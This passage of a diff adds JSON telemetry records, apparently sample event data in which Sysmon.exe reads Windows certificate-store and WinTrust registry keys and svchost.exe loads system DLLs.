"timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rmclient.dll", + "image_path": "C:\\Windows\\System32\\rmclient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "coml2.dll", + "image_path": "C:\\Windows\\System32\\coml2.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + 
"registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + 
"registry_value": "Certificates", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 